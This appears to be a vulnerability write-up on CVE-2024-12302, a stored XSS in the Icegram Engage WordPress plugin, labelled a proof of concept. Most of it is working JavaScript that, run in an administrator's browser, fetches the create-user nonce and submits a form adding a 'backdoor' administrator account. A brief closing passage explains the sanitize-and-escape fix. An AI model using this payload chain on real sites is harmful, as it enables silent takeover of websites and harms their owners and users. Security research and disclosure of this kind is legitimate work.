Icegram Engage, a popular WordPress plugin for building opt-ins, subscription forms, and campaigns, has been found to contain a critical stored Cross-Site Scripting (XSS) vulnerability, tracked as CVE-2024-12302. An authenticated attacker with Editor-level access can inject JavaScript into a campaign's settings; because the value is stored and rendered without adequate sanitization or escaping, the script executes in the browser of any user who views the campaign, including a site administrator. The attacker's script then runs with the administrator's session on the same origin, so it can issue privileged requests on that administrator's behalf, for example to create a backdoor administrator account, leading to full site compromise. The practical effect is therefore a privilege escalation from Editor to Administrator. With over 30,000 active installations, this vulnerability represents a serious threat to WordPress sites running Icegram Engage.
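As an added illustration (not the original post's proof of concept and not Icegram's code), the block below shows the shape of a generic WordPress post-XSS payload that turns script execution in an administrator's browser into a new administrator account. It rides the victim's session rather than stealing it: WordPress sets its auth cookies with HttpOnly, so `document.cookie` does not expose them, but same-origin `fetch` calls carry them automatically. The form field names and the `_wpnonce_create-user` nonce field come from WordPress core's `wp-admin/user-new.php`; the site URL, credentials and the sample HTML used for offline testing are assumptions constructed for the example.

```javascript
// Added example: generic WordPress "stored XSS -> admin account" chain.
// Not the original post's POC and not Icegram Engage code. Field names and
// the nonce field name are from WordPress core's user-new.php; usernames,
// passwords, URLs and the sample HTML below are constructed assumptions.

// Pull the create-user nonce out of the HTML of /wp-admin/user-new.php.
// wp_nonce_field() emits: <input type="hidden" id="..." name="_wpnonce_create-user" value="..." />
function extractCreateUserNonce(html) {
  const m = html.match(/name="_wpnonce_create-user"\s+value="([A-Za-z0-9]+)"/);
  return m ? m[1] : null;
}

// Build the POST body that user-new.php expects when an admin adds a user.
function buildCreateUserBody(nonce, { login, email, password }) {
  const body = new URLSearchParams();
  body.set("action", "createuser");
  body.set("_wpnonce_create-user", nonce);
  body.set("user_login", login);
  body.set("email", email);
  body.set("pass1", password);
  body.set("pass2", password);
  body.set("role", "administrator"); // only honoured if the victim may assign it
  body.set("createuser", "Add New User");
  return body;
}

// Full chain as it would execute inside the victim's browser on the same
// origin: fetch the form to obtain a nonce, then submit the filled form.
// The victim's HttpOnly auth cookies are attached by the browser, not read
// by the script. Requires the victim to be an administrator; otherwise the
// nonce field is absent and the chain aborts.
async function createAdminViaXss(baseUrl, creds) {
  const page = await fetch(baseUrl + "/wp-admin/user-new.php", {
    credentials: "same-origin",
  });
  const nonce = extractCreateUserNonce(await page.text());
  if (!nonce) {
    throw new Error("no create-user nonce found: viewer is not an admin?");
  }
  const resp = await fetch(baseUrl + "/wp-admin/user-new.php", {
    method: "POST",
    credentials: "same-origin",
    headers: { "Content-Type": "application/x-www-form-urlencoded" },
    body: buildCreateUserBody(nonce, creds).toString(),
  });
  return resp.ok;
}

// Constructed sample of the relevant fragment of user-new.php, so the
// parsing and form-building steps can be exercised offline.
const SAMPLE_USER_NEW_HTML =
  '<form method="post" name="createuser" id="createuser" class="validate">' +
  '<input type="hidden" id="_wpnonce_create-user" name="_wpnonce_create-user" value="a1b2c3d4e5" />' +
  '<input type="hidden" name="_wp_http_referer" value="/wp-admin/user-new.php" />' +
  "</form>";

// Usage inside an injected script (assumed site URL and credentials):
//   createAdminViaXss("https://victim.example", {
//     login: "backdoor", email: "b@example.com", password: "S3cretP@ss!" });
```

Two points a practitioner should take from this. First, the chain succeeds only when the stored payload is rendered to someone who holds `create_users`, which is why the realistic impact of CVE-2024-12302 is Editor-to-Administrator escalation rather than an unauthenticated takeover. Second, the defensive fix on the plugin side is the usual WordPress pair: sanitize the campaign setting on save and escape it on output (`esc_html`, `esc_attr`, or `wp_kses` with an allow-list), so the stored value can never reach the page as live markup.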
CVE-2024-12302 – Icegram Engage – Stored XSS to Admin Account Creation – POC
